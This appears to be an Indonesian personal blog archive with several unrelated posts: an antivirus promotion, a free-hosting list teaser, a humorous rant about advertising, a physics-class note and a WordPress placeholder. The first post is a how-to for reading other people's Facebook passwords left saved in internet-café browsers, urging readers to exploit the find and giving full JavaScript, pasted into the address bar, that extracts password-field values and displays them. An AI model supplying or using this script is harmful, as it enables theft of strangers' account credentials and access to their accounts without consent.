Cara Mengetahui Password Facebook Orang Lain [ASTERIX]

 

Mungkin loe pernah mengakses facebook di warnet, dan menemukan ada alamat email plus kode asterix (yang berbentuk bintang) yang muncul pada kotak pengisian password. Wah! rejeki nomplok nie. Rupanya ada pengguna komputer warnet tersebut yang mengakses facebook lalu mencentang pilihan “ingatkan saya” atau “remember me” sehingga alamat email dan passwordnya dalam bentuk asterix tidak hilang saat diakses oleh pengguna lain.

Nah! alamat email sudah dapat sekarang gimana caranya untuk ngebaca isi password yang berbentuk asterix tersebut? caranya mudah kita hanya perlu mengcopy pastekan kode javascript khusus untuk melihat dan membaca isi dari kode asterix tersebut dengan mempastekan kode javascript tersebut ke dalam address bar browser firefox. Mau tau kodenya?

Caranya gampang, loe hanya perlu mengcopy kode javascirpt di bawah ini dan mempastekannya pada kotak address bar browser firefox. Inilah kode javascript untuk melihat kode asterix tersebut:

Spoiler for kode asterix:
javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert(‘Password not found in ‘ + g + ‘ forms’);}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s=”;if (ej.type==’password’){s=ej.value;if (s!=”){prompt(‘Password found ‘, s)}else{alert(‘Password is blank’)}return true;}}

Daftar situs penyedia homepage dan hard drive

Tahukah anda, penyedia HOMEPAGE gratis di internet bukan hanya BLOGGER ATAU WORDPRESS saja. ada cukup banyak situs lain yang juga menyediakan hal serupa. mungkin anda pernah menemui blog yg memiliki nama “beda ” ? Hal semacam itu terjadi karena pemilik blog bersangkutan membuat blognya menggunakan situs lain yg masih jarang digunakan oleh kebanyakan orang.
kalau anda ingin memiliki nama blog yg unik. lain dari yg lain, Anda bisa menggunakan situs lain utk keperluan itu. masing2 situs yg menyediakan fasilitas HOMEPAGE gratis ini tentunya memiliki kebijakan yg berbeda, sekligus juga aneka fitur yg berbeda juga. Dengan menggunakan situs situs berikut ini. anda akan menemukan keleluasaan yg berlebih dlm membuat blog di internet.
Selain situs penyedia HOMEPAGE gratis, daftar berikut ini juga mencakup situs2 yg menyediakan HARD DRIVE VIRTUAL, yakni ruang penyimpanan yg dapat anda gunakan utk menyimpan data data digital anda secara virtual di internet, cara pengunaannya tak jauh berbeda dgn penggunaan EMAIL, dan dapat dimanfaatkan secara gratis pula. selamat mencoba. semoga bermanfaat
Berikut daftar nya :
Lanjutkan membaca


BRIGADE AntiVirus Indonesia 2011

+ Bisa Digabungkan dengan Antivirus Manapun
+ Ringan dan Scanning Cepat serta Akurat
+ Database Lebih dari 5000++
+ Didistribusikan gratis bagi rakyat indonesia tercinta
+ GUI Oke dan Dilengkapi dengan Flashdisk scanner dan Checkping
+ Kecepatan Heuristic yang lumayan tajam.
+ Ada 2 versi : Installer dan Portable
+ Lulus Uji Software International Softpedia Dan Famouswhy
+ Thanks gan … Review selanjutnya bisa dicoba langsung

Tersedia BRIGADE Antivirus PRO edition A Hanya dengan Donatur Sebesar
Rp. 20.000 saja udah dapat penambahan feature dibawah ini :

PRO Edition Type A

Feature PRO Edition A (Promo)

1. Auto Update Reminder External
2. Upspeed Scan 2x Fast
3. Confirm Realease Level By Mail
4. Instan Toolkit 1.5
5. Limited 1 Years
6. View Process Explorer Location
7. Permission Of Profit
8. Monitor Satelite USB
9. Double Heuristic scanning

Kunjungi Lebih Lengkap : http://brigade.herobo.com/1_21_PRO-Edition-Type-A.html

Website : www.brigade.herobo.com
Email : avbrigade@yahoo.com
Update Database Manual : http://brigade-update.4*shared.com

Screenshoot :

Jangan lupa untuk selalu update databasenya…


bangkit lagi….mulai menulis lagi….

Yahooo….Akhirnya setelah sekian lama tidak menulis lagi,gue mulai membuat tulisan di blog ini lagi,mungkin kalian udah pada kangen pengen liat tulisan gue lagi di blog ini (PeDe banget padahal tulisannya baru ada 1).

Tulisan kali ini sebenernya gue disuruh menulis tentang cerita yang konyol-konyol,tapi denganotak primitif gue yang mungkin setara dengan pithecanthropus erectus (bener gak ya tulisannya?) sangat susah buat mencari ide cerita konyol.Jadi gue memutuskan di tulisan ini gue gak bakal bikin cerita konyol tapi gue bakal menulis semua yang ada dipikiran gue tentang hal-hal sekitar gue yang gue anggap aneh atau konyol.

Di tulisan ini yang bakal gue bahas adalah tentang iklan.Loe pernah sadar gak kalo iklan-iklan yang ada di indonesia ini sangat berlebihan banget sampai malah menurut gue gak masuk akal,contohnya coba loe liat semua iklan shampo sama sabun,pasti dalam tayangan iklannya ada seorang cewe yang masuk kamar mandi kemudian mandi trus dia bakal shampoan atau sabunan dengan wajah yang sangat bahagia banget,padahal faktanya gue aja gak pernah kalo shampoan atau sabunan sampe sebahagia kayagitu wajah gue (yang ada,gue shampoan juga seminggu sekali).

Loe pernah liat iklan es krim ma*num kan (dilarang menyebutkan merek),di iklan itu ada cewe yang makan eskrim yang kemudian gara-gara makan eskrimnya dia langsung jadi kaya artis trus dikelilingin sama semua cowo,faktanya gue yang nyoba makan tu es krim sampe habis 10 es krim sama sekali gak ada di kelilingin cewe atau cowo (loh kok cowo?).

Tadi itu adalah beberapa pemikiran gue (masih banyak pemikiran gue yang lain) tentang iklan-iklan yang ada sekarang ini yang gue anggap gak masuk akal atau konyol,mungkin segini dulu tulisan gue kali ini karena gue gak mau bikin tulisan yang terlalu panjang (padahal males sama gak ada ide buat nulis lagi).

 

Nb : kalo ada salah kata mohon dibenarkan,karena yang nulis juga masih dipertanyakan kewarasannya….

 

 

 

See you,peace love N respect

Just Joe


Hasil Pembelajaran FISIKA Di Minggu Pertama

minggu pertama dalam belajar fisika…..

tidak setegang yang gw bayangin,bahkan guru fisikanya yaitu Pak Rudy sangat menyenangkan dalam mengajarnya

terbukti bahwa semua yang dia ajarkan di minggu pertama ini bisa gw pahami,padahal gw dari dulu paling susah kalo harus mahamin rumus-rumus yang susah

dan ini bukti hasil catatan gw di minggu pertama……


Hello world!

Welcome to WordPress.com. This is your first post. Edit or delete it and start blogging!